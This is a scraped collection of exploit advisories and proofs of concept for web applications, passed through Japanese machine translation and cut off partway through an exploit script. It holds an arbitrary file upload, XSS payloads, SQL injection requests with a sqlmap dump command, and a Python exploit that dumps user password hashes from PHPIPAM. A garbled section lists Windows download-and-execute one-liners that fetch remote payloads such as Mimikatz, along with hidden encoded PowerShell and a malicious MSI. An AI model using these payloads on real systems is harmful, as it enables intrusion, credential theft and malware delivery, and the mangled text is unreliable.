media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
# Exploit Title: Landa Driving School Management System 2.0.1 - Arbitrary File Upload
# Version 2.0.1
# Google Dork: N/A
# Date: 17/01/2022
# Exploit Author: Sohel Yousef - sohel.yousef@yandex.com
# Software Link: https://codecanyon.net/item/landa-driving-school-management-system/23220151
Landa Driving School Management System contain arbitrary file upload
registered user can upload .php5 files in attachments section with use of intercept tool in burbsuite to edit the raw
details
POST /profile/attachment/upload/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Language: ar,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------215084716322124620333137564048
Content-Length: 294983
Origin: https://localhost
Connection: close
Referer: https://localhost/profile/91/
Cookie: CSRF-TOKEN=e9055e0cf3dbcbf383f7fdf46d418840fd395995ced9f3e1756bd9101edf0fcf; simcify=97a4436a6f7c5c5cd1fc43b903e3b760
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------215084716322124620333137564048
Content-Disposition: form-data; name="name"
sddd
-----------------------------215084716322124620333137564048
Content-Disposition: form-data; name="csrf-token"
e9055e0cf3dbcbf383f7fdf46d418840fd395995ced9f3e1756bd9101edf0fcf
-----------------------------215084716322124620333137564048
Content-Disposition: form-data; name="userid"
91
-----------------------------215084716322124620333137564048
Content-Disposition: form-data; name="attachment"; filename="w.php.png" >>>>>>>>>>>>>>>> change this to w.php5
Content-Type: image/png
you will have a direct link to the uploaded files
# Exploit Title: Affiliate Pro 1.7 - 'Multiple' Cross Site Scripting (XSS)
# Exploit Author: Vulnerability-Lab
# Date: 05/01/2022
Document Title:
===============
Affiliate Pro v1.7 - Multiple Cross Site Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2281
Release Date:
=============
2022-01-05
Vulnerability Laboratory ID (VL-ID):
====================================
2281
Common Vulnerability Scoring System:
====================================
5.1
Vulnerability Class:
====================
Cross Site Scripting - Non Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Affiliate Pro is a Powerful and yet simple to use PHP affiliate Management System for your new or existing website. Let affiliates
sell your products, bring you traffic or even leads and reward them with a commission. More importantly, use Affiliate Pro to track
it intelligently to keep your affiliates happy and also your bottom line! So how does it work? It is pretty simple, when a user visits
your website through an affiliate URL the responsible affiliate sending the traffic to you will receive a commission based on your settings.
(Copy of the Homepage:https://jdwebdesigner.com/ &https://codecanyon.net/item/affiliate-pro-affiliate-management-system/12908496 )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple reflected cross site scripting web vulnerabilities in the Affiliate Pro - Affiliate Management System v1.7.
Affected Product(s):
====================
jdwebdesigner
Product: Affiliate Pro v1.7 - Affiliate Management System (PHP) (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-08-22: Researcher Notification & Coordination (Security Researcher)
2021-08-23: Vendor Notification (Security Department)
2021-08-30: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2022-01-05: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Guest Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
Multiple reflected cross site scripting web vulnerabilities has been discovered in the Affiliate Pro - Affiliate Management System v1.7.
The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise client-site
browser to web-application requests.
The non-persistent cross site scripting web vulnerabilities are located in the `email`,`username` and `fullname` parameters of the `index` module.
Attackers are able to inject own malicious script code to the `Fullname`,`Username` or `Email` input fields to manipulate client-side requests.
The request method to inject is post and the attack vector is non-persistent (reflected) on client-side. The injection- and execution points are
located in the index formular for affiliates to enter.
Successful exploitation of the vulnerabilities results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to
malicious source and non-persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] index
Vulnerable Input(s):
[+] Email
[+] Username
[+] Fullname
Vulnerable Parameter(s):
[+] email
[+] username
[+] fullname
Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerability can be exploited by remote attackers without account and with low or medium user interaction.
For security demonstration or to reproduce the cross site scripting web vulnerability follow the provided information and steps below to continue.
Exploitation: Payload
<iframe src="javascript:alert(1337)"></iframe>
%3cscript%3ealert(1337)%3c%2fscript%3
--- PoC Session Logs (POST) ---
POST /affiliate-pro-demo/index HTTP/1.1
Host: affiliates-pro.localhost:8000
Origin:http://affiliates-pro.localhost:8000
Cookie: session_id=92b8a43b5bdf5d1c54999bfbcf702f24
Referer:http://affiliates-pro.localhost:8000/affiliate-pro-demo/
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
-
fullname=<iframe src="javascript:alert(1337)"></iframe>
&username=<iframe src="javascript:alert(1337)"></iframe>@pwnd.coml00fp%22%3e%3cscript%3ealert(1337)%3c%2fscript%3ewkgzv
&p=test&confirmpwd=j2B%21p5o%21K8
-
HTTP/1.1 200 OK
Server: Apache
Set-Cookie: session_id=92b8a43b5bdf5d1c54999bfbcf702f24; path=/; HttpOnly
Connection: Upgrade, close
Vary: Accept-Encoding
Content-Length: 6549
Content-Type: text/html; charset=UTF-8
Vulnerable Source: Index
<div class="control-group">
<label class="control-label" for="fullname">Full Name</label>
<div class="controls">
<input id="textinput" name="fullname" type="text" placeholder="Full Name" class="input-xlarge" value="<iframe src="javascript:alert(1337)"></iframe>" required="required">
</div>
</div>
<div class="control-group">
<label class="control-label" for="username">Username</label>
<div class="controls">
<input id="textinput" name="username" type="text" placeholder="username" class="input-xlarge" value="<iframe src="javascript:alert(1337)"></iframe>" required>
</div>
</div>
<div class="control-group">
<label class="control-label" for="email">E-Mail Address</label>
<div class="controls">
<input id="textinput" name="email" type="email" placeholder="test@provider.com" class="input-xlarge" value="<iframe src="javascript:alert(1337)"></iframe>" required>
</div>
Security Risk:
==============
The security risk of the client-side cross site scripting vulnerabilities in the web-application are estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
# Exploit Title: Online Project Time Management System 1.0 - Multiple Stored XSS (Authenticated)
# Date: 19/01/2022
# Exploit Author: Felipe Alcantara (Filiplain)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Kali Linux
# Description: Stored XSS in multiple fields...
# Steps to reproduce (with employee Access)
# Log in as an employee
# Go to : http://localhost/ptms/?page=user
# Add XSS payload to any field of the user's name.
#Click Update
=================
POST /ptms/classes/Users.php?f=save_employee HTTP/1.1
Host: localhost
Content-Length: 1339
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvsLkAfaBC64Uzoak
Origin: http://localhost
Referer: http://localhost/ptms/?page=user
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm
Connection: close
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="id"
4
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="code"
2022-0003
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="generated_password"
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="firstname"
Mark
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="middlename"
<script>alert("XSS_TEST")</script>
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="lastname"
Cooper
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="gender"
Male
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="department"
IT Department
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="position"
Department Manager
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="email"
mcooper@sample.com
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="password"
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryvsLkAfaBC64Uzoak--
=================
-----------------------------------------------------------------------------
# Steps to reproduce (with Admin access)
# Log in to the admin panel
# Go to : http://localhost/ptms/admin/?page=system_info
# Add XSS payload to the 'System Name' field
#Click Update
=================
POST /ptms/classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: localhost
Content-Length: 603
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCibB6pEzThjb4Zcq
Origin: http://localhost
Referer: http://localhost/ptms/admin/?page=system_info
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm
Connection: close
------WebKitFormBoundaryCibB6pEzThjb4Zcq
Content-Disposition: form-data; name="name"
Online Project Time Management System - PHP <script>alert("XSS")</script>
------WebKitFormBoundaryCibB6pEzThjb4Zcq
Content-Disposition: form-data; name="short_name"
PTMS - PHP
------WebKitFormBoundaryCibB6pEzThjb4Zcq
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryCibB6pEzThjb4Zcq
Content-Disposition: form-data; name="cover"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryCibB6pEzThjb4Zcq--
=================
# Exploit Title: Online Project Time Management System 1.0 - SQLi (Authenticated)
# Date: 19/01/2022
# Exploit Author: Felipe Alcantara (Filiplain)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Kali Linux
# Steps to reproduce
# Log in as an employee
# Go to : http://localhost/ptms/?page=user
# Click Update
# Save request in BurpSuite
# Run saved request with sqlmap: sqlmap -r request.txt --batch --risk 3 --level 3 --dump
==========================
POST /ptms/classes/Users.php?f=save_employee HTTP/1.1
Host: localhost
Content-Length: 1362
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary39q8yel1pdwYRLNz
Origin: http://localhost
Referer: http://localhost/ptms/?page=user
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm
Connection: close
------WebKitFormBoundary39q8yel1pdwYRLNz
Content-Disposition: form-data; name="id"
4' AND (SELECT 1 FROM (SELECT(SLEEP(4)))test)-- test
------WebKitFormBoundary39q8yel1pdwYRLNz
Content-Disposition: form-data; name="code"
2022-0003
------WebKitFormBoundary39q8yel1pdwYRLNz
Content-Disposition: form-data; name="generated_password"
------WebKitFormBoundary39q8yel1pdwYRLNz
Content-Disposition: form-data; name="firstname"
Mark 2223
------WebKitFormBoundary39q8yel1pdwYRLNz
Content-Disposition: form-data; name="middlename"
Z
------WebKitFormBoundary39q8yel1pdwYRLNz
Content-Disposition: form-data; name="lastname"
Cooper
------WebKitFormBoundary39q8yel1pdwYRLNz
Content-Disposition: form-data; name="gender"
Male
------WebKitFormBoundary39q8yel1pdwYRLNz
Content-Disposition: form-data; name="department"
IT Department
------WebKitFormBoundary39q8yel1pdwYRLNz
Content-Disposition: form-data; name="position"
Department Manager
------WebKitFormBoundary39q8yel1pdwYRLNz
Content-Disposition: form-data; name="email"
mcooper@sample.com
------WebKitFormBoundary39q8yel1pdwYRLNz
Content-Disposition: form-data; name="password"
------WebKitFormBoundary39q8yel1pdwYRLNz
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundary39q8yel1pdwYRLNz--
==========================
#Payloads
#++++++++++++
#Payload: (Boolean-Based Blind)
#------WebKitFormBoundary39q8yel1pdwYRLNz
#Content-Disposition: form-data; name="id"
#4' or 1=1 --
#--------
#Payload: (time-based blind)
#------WebKitFormBoundary39q8yel1pdwYRLNz
#Content-Disposition: form-data; name="id"
#4' AND (SELECT 1 FROM (SELECT(SLEEP(4)))test)-- test
#-------
# Exploit Title: WordPress Plugin Mortgage Calculators WP 1.52 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 25-10-2021
# Exploit Author: Ceylan Bozogullarindan
# Vendor Homepage: https://lenderd.com/
# Software Link: https://mortgagecalculatorsplugin.com/
# Version: 1.52
# Tested on: Linux
# CVE : CVE-2021-24904 (https://wpscan.com/vulnerability/7b80f89b-e724-41c5-aa03-21d1eef50f21)
# Description:
The plugin gives users real-time estimates by providing mortgage calculators. It does not implement any sanitisation on the color value of the background of a calculator in admin panel, which could lead to authenticated Stored Cross-Site Scripting issues. An attacker can execute malicious javascript codes for all visitors of a page containing the calculator.
# Steps To Reproduce:
1. Go to settings page available under the "Calculator" menu item.
2. Click the "Select Color" button and type the following payload the input space: `hacked</style></head><script>alert(1)</script>`
3. Click the "Save Changes" button to save settings.
4. Create a new page and add the shortcode ([mcwp type="cv"]) of the calculator, for testing.
5. Visit the page to trigger XSS.
# Exploit Title: PHPIPAM 1.4.4 - SQLi (Authenticated)
# Google Dork: [if applicable]
# Date: 20/01/2022
# Exploit Author: Rodolfo "Inc0gbyt3" Tavares
# Vendor Homepage: https://github.com/phpipam/phpipam
# Software Link: https://github.com/phpipam/phpipam
# Version: 1.4.4
# Tested on: Linux/Windows
# CVE : CVE-2022-23046
import requests
import sys
import argparse
################
"""
Author of exploit: Rodolfo 'Inc0gbyt3' Tavares
CVE: CVE-2022-23046
Type: SQL Injection
Usage:
$ python3 -m pip install requests
$ python3 exploit.py -u http://localhost:8082 -U <admin> -P <password>
"""
###############
__author__ = "Inc0gbyt3"
menu = argparse.ArgumentParser(description="[+] Exploit for PHPIPAM Version: 1.4.4 Authenticated SQL Injection\n CVE-2022-23046")
menu.add_argument("-u", "--url", help="[+] URL of target, example: https://phpipam.target.com", type=str)
menu.add_argument("-U", "--user", help="[+] Username", type=str)
menu.add_argument("-P", "--password", help="[+] Password", type=str)
args = menu.parse_args()
if len(sys.argv) < 3:
menu.print_help()
target = args.url
user = args.user
password = args.password
def get_token():
u = f"{target}/app/login/login_check.php"
try:
r = requests.post(u, verify=False, timeout=10, headers={"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"}, data={"ipamusername":user, "ipampassword":password})
headers = r.headers['Set-Cookie']
headers_string = headers.split(';')
for s in headers_string:
if "phpipam" in s and "," in s: # double same cookie Check LoL
cookie = s.strip(',').lstrip()
return cookie
except Exception as e:
print(f"[+] {e}")
def exploit_sqli():
cookie = get_token()
xpl = f"{target}/app/admin/routing/edit-bgp-mapping-search.php"
data = {
"subnet":'pwn"union select(select concat(@:=0x3a,(select+count(*) from(users)where(@:=concat(@,email,0x3a,password,"0x3a",2fa))),@)),2,3,user() -- -', # dios query dump all :)
"bgp_id":1
}
headers = {
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Cookie": cookie
}
try:
r = requests.post(xpl, verify=False, timeout=10, headers=headers, data=data)
if "admin" in r.text or "rounds" in r.text:
print("[+] Vulnerable..\n\n")
print(f"> Users and hash passwords: \n\n{r.text}")
print("\n\n> DONE <")
except Exception as e:
print(f"[-] {e}")
if __name__ == '__main__':
exploit_sqli()
1.BitsAdminコマンド(指定されたパス、Win7以降にコマンドのみをダウンロードできます):
bitsadmin/mydownloadjob/download/download/priority normal 'http://img5.5.5.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg' 'D: \ ABC.jpg' '' '' d: \
BitsAdmin /Transfer D90f 3http://Site.com/A%AppData%\ D90f.exe%AppData%\ D90f.exedel%appdata%\ d90f.exe
2.PowerShellの名前のダウンロードと実行:( Win7以降)
PowerShell IEX(new-Object Net.WebClient).DownLoadString( 'https://Raw.githubusercontent.com/mattifestation/powersploit/master/exfiltration/invoke-mimikatz.ps1'); Invoke-Mimikatz
Powershell -exec bypass -f \\ webdavserver \ folder \ payload.ps1
powershell (new-object System.Net.WebClient).DownloadFile( 'http://192.168.168.183/1.exe','C:\111111111111111111111.exe')
PowerShell -W Hidden -C(new-Object System.net.WebClient).DownLoadFile( 'http://img5.cache.netease.com/photo/0001/2013-03-28/8r1bk3qo3r710001.jpg'、 'd3360 \\ 1.jpg')
3.mshtaコマンドダウンロードと実行
MSHTA VBScript:Close(execute( 'getObject(' 'script:http://webserver/payload.sct' ')))))
MSHTA http://Webserver/payload.hta ---短いドメイン名:http://SINA.lt/ - MSHTA http://T.CN/RYUQYF8
mshta \\ webdavserver \ folder \ payload.hta
payload.hta
HTML
Meta http-equiv='content-type' content='text/html; charset=utf-8 '
頭
スクリプト言語='vbscript'
window.resizeto 0、0
Window.Moveto -2000、-2000
set objshell=createObject( 'wscript.shell')
objshell.run 'calc.exe'
self.close
/スクリプト
体
デモ
/体
/頭
/HTML
4。 rundll32コマンドダウンロードと実行
rundll32 \\ webdavserver \ folder \ payload.dll、エントリポイント
rundll32.exe javascript: '\ . \ mshtml、runhtmlapplication'; o=getobject( 'script:3358webserver/payload.sct'); window.close();
参照:https://github.com/3gstudent/javascript-backdoor
5.NET Regasmコマンドをダウンロードして実行します
c: \ windows \ microsoft.net \ framework64 \ v4.0.30319 \ regasm.exe /u \ webdavserver\folder\payload.dll
6.CMDリモートコマンドのダウンロード:
cmd.exe /k \\ webdavserver \ folder \ batchfile.txt
7.REGSVR32コマンドのダウンロードと実行
regsvr32 /u /n /s /i3360http://webserver/payload.sct scrobj.dll
regsvr32 /u /n /s /i: \ webdavserver\folder\payload.sct scrobj.dll
regsvr32 /u /s /i:3358site.com/js.png scrobj.dll
js.png
?xmlバージョン='1.0'?
スクリプトレット
登録
progid='shortjsrat'
classId='{10001111-0000-0000-0000-0000-0000Feedacdc}'
! - Casey Smith @Subteeから学ぶ -
スクリプト言語='jscript'
![cdata [
ps='cmd.exe /c calc.exe';
new ActiveXObject( 'wscript.shell')。run(ps、0、true);
]]
/スクリプト
/登録
/スクリプトレット
8.Certutilコマンドのダウンロードと実行
certutil -urlcache -split -f http://webserver/ペイロードペイロード
certutil -urlcache -split -f http://webserver /payload.b64 payload.b64 certutil -decode payload.b64 payload.dll c: \ windows \ microsoft.net \ framework64 \ v4.0.30319 \ instalutil /logfile=ulgfile=ul gaylod.
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 certutil -decode payload.b64 payload.exe payload.exe
certutil -urlcache -split -f http://site.com/a a.exe a.exe del a.exe certutil -urlcache -f http://192.168.254.102:80/a Delete
9.net 9.net
でmsbulidコマンドをダウンロードして実行しますcmd /v /c 'set mb=' c: \ windows \ microsoft.net \ framework64 \ v4.0.30319 \ msbuild.exe '!mb! /noauteresponse /preprocess \\ webdavserver \ folder \ payload.xml payload.xml!mb! payload.xml '
10。 ODBCCONFコマンドのダウンロードと実行
odbcconf /s /a {regsvr \\ webdavserver \ folder \ payload_dll.txt}
11.cscriptスクリプトリモートコマンドのダウンロードと実行
cscript/b c: \ windows \ system32 \ printing_admin_scripts \ zh-cn \ pubprn.vbs 127.0.0.1 Script:https://raw.githubusercontent.com/3gstudent/test/master/downdoadexec3.sct
cscript //e:jscript \\ webdavserver \ folder \ payload.txt
downfile.vbs:
'設定を設定します
strfileurl='https://hacker.bz/t/tu/ckhxbukkqru9204.jpg'
strhdlocation='c: \ logo.jpg'
'ファイルを取得します
set objxmlhttp=createObject( 'msxml2.xmlhttp')
objxmlhttp.open 'get'、strfileurl、false
objxmlhttp.send()
objxmlhttp.status=200の場合
objadostream=createObject( 'adodb.stream')を設定します
objadostream.open
objadostream.type=1 'adtypebinary
objadostream.write objxmlhttp.responsebody
objadostream.position=0'STREMの位置を開始までセットします
set objfso=createObject( 'scripting.filesystemobject')
objfso.fileexists(strhdlocation)の場合、objfso.deletefile strhdlocation
objfso=何も設定しません
objadostream.savetofile strhdlocation
objadostream.close
objadostream=Nothingを設定します
ifを終了します
objxmlhttp=何も設定しません
上記をdownfile.vbsとして保存します
コマンドを入力してください:cscript downfile.vbs
12.pubprn.vbsコマンドをダウンロードして実行
cscript /b c: \ windows \ system32 \ printing_admin_scripts \ zh-cn \ pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.scs
13.windowsには独自のコマンドコピーが付属しています
コピー\\ x.x.x.x \ xx \ poc.exe
Xcopy D: \ test.exe \\ x.x.x \ test.exe
14。 iexplore.exeコマンドをダウンロードして実行します(つまり、odayが必要です)
'C: \ Program Files \ Internet Explorer \ iexplore.exe' http://site.com/exp
15.ieexcコマンドのダウンロードと実行
c: \ windows \ microsoft.net \ framework \ v2.0.50727 \ caspol -s off
c: \ windows \ microsoft.net \ framework \ v2.0.50727 \ ieexec http://site.com/files/test64.exe
参照:https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
16。 msiexecコマンドのダウンロードと実行
msiexec /q /i https://hacker.bz/t/tu/icr2sy1pdlx9205.png
この方法は、以前の2つの記事《渗透测试中的msiexec》 《渗透技巧——从Admin权限切换到System权限》で紹介されています。この方法を紹介しましたが、詳細を繰り返しません。
まず、Base64エンコーディングは、PowerShell実装のダウンロードと実行のコードとして使用されます。
$ filecontent='(new-Object System.net.webclient).downloadfile(' https://github.com/3gstudent/test/raw/master/putty.exe '、' c: \ download \ a.exe '); start-process' c3360
$ bytes=[system.text.encoding] :3360Unicode.getBytes($ filecontent);
$ encoded=[System.Convert] :3360TOBASE64STRING($ bytes);
$エンコード
得る:
kabuaguadwatag8aygbqaguaywb0acaauwb55ahmadablag0algboaguadauafcazqbiaemababguabguabgB0Ackalgbeag8adwbuagwabw bhagqargbpagwazqaoaccaaab0ahqacabzadoalwavagcaaqb0aggadqbiac4aywbvag0alwazagcacwb0ahuazablag4adavahqazqbz ahqalwbyageadwavag0ayqbzahqazqbyac8acab1ahqadab5ac4azqb4aguajwasaccaywa6afwazabvahcabgbsag8ayqbkafwayqaua guaeablaccaka7ahmadabhahiaatahaacgbvagmazqbzahmaiaanagmaogbcagqabwb3ag4abvageazabcagealgblahgazqanaa==
完全なPowerShellコマンドは次のとおりです。
PowerShell -WindowStyle Hidden -Ec kabuaguadwatag8aygbqaguaywb0acaauwb55ahmadablag0algboaguadauafcazqbiaemababguabguabgB0Ackalgbeag8adwbuagwabw bhagqargbpagwazqaoaccaaab0ahqacabzadoalwavagcaaqb0aggadqbiac4aywbvag0alwazagcacwb0ahuazablag4adavahqazqbz ahqalwbyageadwavag0ayqbzahqazqbyac8acab1ahqadab5ac4azqb4aguajwasaccaywa6afwazabvahcabgbsag8ayqbkafwayqaua guaeablaccaka7ahmadabhahiaatahaacgbvagmazqbzahmaiaanagmaogbcagqabwb3ag4abvageazabcagealgblahgazqanaa==
完全なWIXファイルは次のとおりです。
?xmlバージョン='1.0'?
WIX XMLNS='http://SCHEMAS.MICROSOFT.COM/WIX/2006/WI'
製品ID='*' upgradeCode='12345678-1234-1234-1234-11111111111111111111111111111111111111111111111111111111111111111年目の例
名前'バージョン=' 0.0.1 'メーカー='@_ xpn_ '言語=' 1033 '
パッケージinstallerversion='200'圧縮='はい'コメント='Windowsインストーラーパッケージ'/
メディアID='1' /
ディレクトリid='targetdir' name='sourcedir'
ディレクトリID='ProgramFilesFolder'
ディレクトリid='installlocation' name='example'
Component Id='ApplicationFiles' Guid='12345678-1234-1234-1234-2222222222222222222222222222222222222222
/成分
/ディレクトリ
/ディレクトリ
/ディレクトリ
feature id='defaultfeature' level='1'
componentref id='applicationFiles'/
/特徴
プロパティID='CMDLINE'POWERSHELL -WINDOWSTYLE HIDDEN -ENC kabuaguadwatag8aygbqaguaywb0acaauwb55ahmadablag0algboaguadauafcazqbiaemababguabguabgB0Ackalgbeag8adwbuagwabw bhagqargbpagwazqaoaccaaab0ahqacabzadoalwavagcaaqb0aggadqbiac4aywbvag0alwazagcacwb0ahuazablag4adavahqazqbz ahqalwbyageadwavag0ayqbzahqazqbyac8acab1ahqadab5ac4azqb4aguajwasaccaywa6afwazabvahcabgbsag8ayqbkafwayqaua guaeablaccaka7ahmadabhahiaatahaacgbvagmazqbzahmaiaanagmaogbcagqabwb3ag4abvageazabcagealgblahgazqanaa==
/財産
Customaction ID='SystemShell' execute='Deferred' Directory='TargetDir'
execommand='[cmdline]' return='無視' Imprionate='no'/
customaction id='failinstall' execute='deferred' script='vbscript' return='check'
VBSがインストールに失敗するように無効になりました
/カスタムアクション
InstallexecuteSequence
カスタムアクション='Systemshell' after='installInitialize'/custom
カスタムアクション='failinstall' before='installfiles'/custom
/installexecuteSequence
/製品
/wix
コンパイルしてMSIファイルを生成します。コマンドは次のとおりです。
candle.exe msgen.wix
light.exe msgen.wixobj
test.msiを生成します
実装関数:msiexec/q/i 3https://github.com/3gstudent/test/raw/master/test.msi
注:実行後、プロセスを手動で終了する必要がありますmsiexec.exe
Baiduが提供する短いアドレスサービス(http://dwz.cn/)と組み合わせると、実装コードは34文字で、コードは次のとおりです。
msiexec /q /i http://dwz.cn/6ujpf8
17。コマンドをダウンロードして、Project GreatSct
を実行しますhttps://github.com/greatsct/
# Exploit Title: WordPress Plugin RegistrationMagic V 5.0.1.5 - SQL Injection (Authenticated)
# Date 23.01.2022
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://registrationmagic.com/
# Software Link: https://downloads.wordpress.org/plugin/custom-registration-form-builder-with-submission-manager.5.0.1.5.zip
# Version: <= 5.0.1.5
# Tested on: Ubuntu 20.04
# CVE: CVE-2021-24862
# CWE: CWE-89
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24862/README.md
'''
Description:
The RegistrationMagic WordPress plugin before 5.0.1.6 does not escape user input in its rm_chronos_ajax AJAX action
before using it in a SQL statement when duplicating tasks in batches, which could lead to a SQL injection issue.
'''
# Banner:
import os
banner = '''
_____ _____ _____ ___ ___ ___ ___ ___ ___ ___ ___ ___
| | | | __|___|_ | |_ |_ | ___|_ | | | . | _|_ |
| --| | | __|___| _| | | _|_| |_|___| _|_ | . | . | _|
|_____|\___/|_____| |___|___|___|_____| |___| |_|___|___|___|
[+] RegistrationMagic SQL Injection
[@] Developed by Ron Jost (Hacker5preme)
'''
print(banner)
import string
import argparse
import requests
from datetime import datetime
import random
import json
import subprocess
# User-Input:
my_parser = argparse.ArgumentParser(description='Wordpress Plugin RegistrationMagic - SQL Injection')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
